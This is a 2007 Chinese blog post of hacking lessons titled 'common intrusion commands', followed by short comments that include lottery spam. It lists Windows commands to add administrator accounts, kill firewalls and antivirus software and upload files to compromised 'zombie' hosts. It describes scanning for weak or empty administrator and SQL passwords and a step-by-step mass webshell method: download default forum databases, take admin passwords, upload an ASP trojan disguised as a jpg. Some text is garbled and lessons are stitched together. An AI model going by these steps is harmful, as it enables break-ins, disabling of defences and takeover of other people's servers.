放飞梦想---请牢记本站域名:www.itla.com.cn欢迎再次来访!!

  路漫漫其修远兮,吾将上下而求索………

posts - 51, comments - 157, trackbacks - 0, articles - 0
  IT博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

常用入侵命令

Posted on 2007-05-15 22:17 碉堡 阅读(1136) 评论(5)  编辑 收藏 引用 所属分类: 电脑应用

第一课: 入侵必备DOS命令总结
一.对用户操做

net user --------查看有哪些用户

net user guest /active:yes ------ 激活guest用户

net user 用户名 密码 /add ------建立用户

net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限

二.必备命令

net start -----查看开启了哪些服务

net start 服务名-----开启服务

net stop 服务名------停止某服务

netstat -an :查看端口的网络连接情况

ipconfig :查看本地ip地址

三.关防火墙,杀毒软件命令

net stop sharedaccess ----关系统自带防火墙

pskill.exe ravmon -----杀掉瑞星软件

pskill.exe pfw ----关天网防火墙

net stop "Symantec AntiVirus"----关于诺顿企业版

net stop KAVStart------关闭金山杀毒

向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP get xx.exe

:计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

第二课:x-scan扫描器的使用技巧详解

一.详解x-scan的配置:

1.扫描模块设置:

1).开放服务

(2).远程控制系统

(3).nt-server弱口令-----administrator 空口令或弱口令.

(4).sql-server弱口令 ---sa 空口令或弱口令.

2.扫描IP范围设置:

(1).指定IP范围.

(2).从文件中导入IP列表.

二.x-scan在入侵中的应用:

1.对系统的综合安全检测,有针对性的入侵.

2.找肉鸡

nt-server弱口令

sql-server弱口令

3.邮箱,ftp,vnc的破解

三.x-scan入侵实例演示部分:

1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)

2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)

s扫描-----扫开放1433的机子

x-scan扫描-----对开放1433的机子进行弱口令探测.

第五课:网站猎手批量入侵实战演示

黑天

一.二个重点要素:

1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.

选择技巧:一般选择论坛最低部的版权信息或程序名称.

2.检测的页面或文件: 也就是程序存在漏洞的地方

二.网站猎手批量入侵实战演示篇:

1.实战演示一:

检测的页面或文件: data/dvbbs7.mdb

关键字:Powered By :Dvbbs Version 7.0.0

由默认数据库到拿网站webshell过程:

第一步:下载动网默认数据库

第二步:在数据库中找管理员密码

技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.

第三步:在前台以jpg格式上传asp木马.

第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.

2.演示二:

检测的页面或文件:database/bbsxp.mdb

关键字:Powered by BBSXP 7.00

3.演示三:

检测的页面或文件:upfile_flash.asp

关键字:商城

四:关于批量得webshell的其它思路

1.思路一:

到大型源码下载中心,把下载量较大的源程序,下载回来研究.

主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.

然后用关键字结合网站猎手批量检测.很快就提到大量webshell

2.思路二:社会工程学批量入侵拿webshell

1.免杀

 

2.破解

 

3.程序汉化,个性修改.

 

二.脱壳四步骤:

第一步:查壳

常用查壳工具: PEID ,FI ,PE-SCAN 等.

第二步:找OEP

工具:ollydbg

第三步:脱壳

常用脱壳工具:

1.OD自带的脱壳插件:右键脱壳之.

2.LordPE:选择所调试进程右键,完整脱壳.

第四步:修复

Import REConstructor 1.6

三.在ollydbg脱壳中常用快捷键介绍

F2: 下断点.

F4:运行到所选择的那一行.-----遇到向上跳时用到

F7:单步进入----遇到近call时用到.

F8:单步跟踪

F9:运行程序

Shift+F9 :忽略异常运行

Alt+M:打开内存镜像

Feedback

# re: 常用入侵命令  回复  更多评论   

2007-05-16 16:07 by 防火墙
老文章了,还是支持

# re: 常用入侵命令  回复  更多评论   

2007-05-17 15:08 by 福彩3D
中彩网双色球预测http://www.fcw163.com/ssq.asp
中彩网排列3预测http://www.fcw163.com/jinyin.asp
中彩网福彩3D预测http://www.fcw163.com/fc3d.asp

# re: 常用入侵命令  回复  更多评论   

2007-05-17 19:44 by 电脑迷
支持
只有注册用户登录后才能发表评论。